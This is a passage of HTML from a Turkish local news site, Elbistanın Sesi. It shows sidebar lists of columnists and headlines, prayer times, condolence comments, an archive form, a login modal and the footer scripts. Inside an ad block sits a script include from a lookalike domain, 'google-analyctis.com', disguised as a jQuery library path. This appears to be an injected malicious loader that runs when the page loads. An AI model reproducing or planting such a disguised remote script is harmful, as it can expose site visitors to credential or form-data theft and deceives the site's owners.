              <a href="https://www.elbistaninsesi.com/tutarsiz-ve-kisiligi-iplige-donenler-makale,6334.html" title="Tutarsız ve Kişiliği İpliğe Dönenler" >Tutarsız ve Kişiliği İpliğe Dönenler</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/yitirin-beni-kendisine-yazdigi-agit-makale,6326.html" title="YİTİRİN BENİ (Ken­di­si­ne Yaz­dı­ğı Ağıt)" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="https://www.elbistaninsesi.com/yitirin-beni-kendisine-yazdigi-agit-makale,6326.html" title="YİTİRİN BENİ (Ken­di­si­ne Yaz­dı­ğı Ağıt)" >YİTİRİN BENİ (Ken­di­si­ne Yaz­dı­ğı Ağıt)</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ahmet-hocamiz-makale,6324.html" title="AHMET HO­CA­MIZ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="https://www.elbistaninsesi.com/ahmet-hocamiz-makale,6324.html" title="AHMET HO­CA­MIZ" >AHMET HO­CA­MIZ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/allah-acinizi-unutturmasin-makale,6321.html" title="ALLAH ACINIZI UNUTTURMASIN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/kitap1.jpg" alt="Sevda Küçük">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/62/sevda-kucuk" title="Sevda Küçük">Sevda Küçük</a></h4>
              <a href="https://www.elbistaninsesi.com/allah-acinizi-unutturmasin-makale,6321.html" title="ALLAH ACINIZI UNUTTURMASIN" >ALLAH ACINIZI UNUTTURMASIN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/yonetimde-basari-nasil-saglanir-makale,6320.html" title="YÖNETİMDE BAŞARI NASIL SAĞLANIR?" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmetcavaY.jpg" alt="Prof.Dr. Mehmet ÇAVAŞ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/39/profdr-mehmet-cavas" title="Prof.Dr. Mehmet ÇAVAŞ">Prof.Dr. Mehmet ÇAVAŞ</a></h4>
              <a href="https://www.elbistaninsesi.com/yonetimde-basari-nasil-saglanir-makale,6320.html" title="YÖNETİMDE BAŞARI NASIL SAĞLANIR?" >YÖNETİMDE BAŞARI NASIL SAĞLANIR?</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/6698-sayili-kisisel-verilerin-korunmasi-kanunu-makale,6306.html" title="6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tara0006.jpg" alt="Av. Fatma Okur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/100/av-fatma-okur" title="Av. Fatma Okur">Av. Fatma Okur</a></h4>
              <a href="https://www.elbistaninsesi.com/6698-sayili-kisisel-verilerin-korunmasi-kanunu-makale,6306.html" title="6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU" >6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/cikmaz-sokaktan-kurtuluyoruz-makale,6298.html" title="Çıkmaz Sokaktan Kurtuluyoruz" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/vesikalYk_a_g.jpeg" alt="Ahmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/3/ahmet-gocer" title="Ahmet Göçer">Ahmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/cikmaz-sokaktan-kurtuluyoruz-makale,6298.html" title="Çıkmaz Sokaktan Kurtuluyoruz" >Çıkmaz Sokaktan Kurtuluyoruz</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="https://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >Has­re­tin şa­fa­ğın­da aza­zen</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html" title="Edibe Odacıoğlu 87 yaşında" >Edibe Odacıoğlu 87 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/polisten-motosiklet-suruculerine-hayat-kurtaracak-hediye-h71612.html" title="Polisten motosiklet sürücülerine hayat kurtaracak hediye" >Polisten motosiklet sürücülerine hayat kurtaracak hediye</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/kiraz-agaci-ekim-ayinda-cicek-acti-h71428.html" title="Kiraz ağacı ekim ayında çiçek açtı" >Kiraz ağacı ekim ayında çiçek açtı</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/daha-temiz-bir-nurhak-icin-7den-70e-bir-araya-geldiler-h70967.html" title="Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler" >Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/terbuzekteki-kirmizi-benekli-alabalik-olumleri-vatandasi-endiselendiriyor-h70711.html" title="Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor" >Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>05:41</td>
            <td>07:04</td>
            <td>12:22</td>
            <td>15:06</td>
            <td>17:30</td>
            <td>18:48</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="https://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html#comment_365097" title="" >Allah rahmet eylesin. Mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/emis-aslan-61-yasinda-h71881.html#comment_365096" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/suleyman-bilen-h71879.html#comment_365095" title="" >Allah rahmet eylesin rabbim yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/emis-aslan-61-yasinda-h71881.html#comment_365094" title="" >Allah rahmet eylesin rabbim yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html#comment_365093" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/suleyman-bilen-h71879.html#comment_365092" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html#comment_365091" title="" >ALLAH ganigani rahmet eylesin mekani cennet...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/emis-aslan-61-yasinda-h71881.html#comment_365090" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html#comment_365089" title="" >Mevlam rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/emis-aslan-61-yasinda-h71881.html#comment_365088" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/suleyman-bilen-h71879.html#comment_365087" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html#comment_365086" title="" >Çok gençmiş. Yazık. Allah rahmet eylesin.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/suleyman-bilen-h71879.html#comment_365085" title="" >Allah Rahmet Eylesin Mekanı Cennet Olsun.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/emis-aslan-61-yasinda-h71881.html#comment_365084" title="" >Merhumeye Allahtan rahmet diliyorum.</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html#comment_365083" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/vefat-tesekkur-mehmet-yildirim-h71857.html#comment_365082" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/emis-aslan-61-yasinda-h71881.html#comment_365081" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html#comment_365080" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/suleyman-bilen-h71879.html#comment_365079" title="" >Merhuma Allah’tan rahmet; yakınlarına...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html#comment_365078" title="" >Merhuma Allah’tan rahmet; yakınlarına...</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="https://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" selected>14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" selected>Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="https://www.elbistaninsesi.com/rss"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="650009070c1611040b0c0b1600160c02041f001100160c250208040c094b060a08">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="https://www.elbistaninsesi.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fmuhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="https://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="https://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('71884', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
